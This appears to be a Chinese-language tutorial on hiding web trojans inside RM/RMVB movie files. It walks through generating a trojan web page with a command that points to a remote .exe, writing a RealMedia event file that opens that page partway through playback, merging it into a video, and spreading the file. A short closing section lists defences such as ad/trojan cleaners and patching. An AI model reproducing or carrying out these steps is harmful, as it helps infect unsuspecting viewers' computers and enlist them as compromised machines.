時至歲末,各種各樣的賀歲片紛紛出爐,這也是黑客利用夾帶網頁木馬的RM/RMVB電影檔案捕捉肉雞的好時節,許多人紛紛中招。那麼黑客是怎麼把網頁木馬加入RM/RMVB電影中的呢?
步驟/方法
RM/RMVB唯一能夾帶網頁木馬的格式
在所有電影格式裡面,為什麼就只有RM/RMVB就夾帶網頁木馬呢?這與該格式的釋出者Real公司有關。Real公司允許在RM/RMVB格式的檔案裡,插入使用者設定的任意網頁連結來進行廣告宣傳,當這些網頁連結被開啟時預設使用的是Real公司的瀏覽器。
可是沒想到這種方法,沒有給Real公司帶來多少實際利益,卻為黑客提供了一種方便的網頁木馬傳播手段。只需要將網頁木馬的連結新增在RM/RMVB裡面,當用戶開啟時就會中招。
小提示:其他電影格式就只能用捆綁木馬的方式傳播。
網馬捆綁RM並不難
第一步:製作網頁木馬
首先準備好一個木馬的服務端程式,將它上傳到網路空間裡面,得到一個服務端檔案的連結。現在利用最新的MCAfee網頁木馬生成器來建立一個網頁木馬。先開啟系統的命令提示符視窗,在視窗切換到生成器所在的目錄,比如輸入“cd d:”就可以進入D盤。
接著執行命令:McAfee [生成HTML檔名],我們按照程式的提示要求輸入:McAfee http://www.mm.Com/mm.exe cs.Html(如圖1),既可以在程式目錄建立一個網頁木馬。現在將生成的網頁木馬上傳到網頁空間即可。 第二步:製作時間檔案
開啟記事本程式,在其中輸入下面的一段程式碼:u 00:10:00.0 00:11:00.0 如圖2)。這段程式碼的意思是在影片的第10分鐘到11分鐘的時候,開啟後面的“http: //www.mm.Com/cs.Html”的這個網頁連結,這個網頁連結就是我們剛剛設定的網頁木馬的地址,然後將它儲存為一個任意名稱的文字檔案。 第三步:製作網馬RM
準備一段RM或RMVB視訊檔案以及相關的視訊編輯工具RealMedia Editor。接著啟動編輯程式,點選“檔案”選單下的“開啟Real媒體檔案”命令,來開啟準備好的那段RM/RMVB視訊檔案。
然後點選“工具”選單下的“合併事件”命令,再選擇剛才製作的那個文字檔案。最後點選“檔案”選單下的“RealMedia檔案另存為”命令,對這個合併的檔案重新進行另存為操作即可(如圖3)。現在將這個惡意的RM檔案傳播出去,當人們觀看這個RM/RMVB檔案後,就可能通過網頁木馬植入木馬程式。
防範方法
當RM或RMVB檔案下載到本隊以後,可以通過“超級兔子RM廣告清除器”對檔案進行掃描。執行“超級兔子RM廣告清除器”,在“輸入要去除廣告的檔名”中選擇RM檔案,再在“輸入新生成的檔名”設定除掉網頁廣告或木馬後的RM檔案,然後點選“開始清除”按鈕就會進行掃描(如圖4)。如果發現廣告資訊或木馬資訊,就會自動清除並彈出一個對話方塊提示使用者。其實最簡單方法就是下載完成後,斷掉網路再進行檔案的觀看。
對於那些嵌入到網頁中的RM/RMVB檔案,首先使用者需要安裝最新的系統,以及應用程式的補丁程式。這樣網頁木馬就不能啟用漏洞來下載安裝木馬程式,也可以通過IE衛士、金山清理專家、瑞星卡卡的網頁木馬攔截功能,對這些檔案中可能存在的網頁木馬進行攔截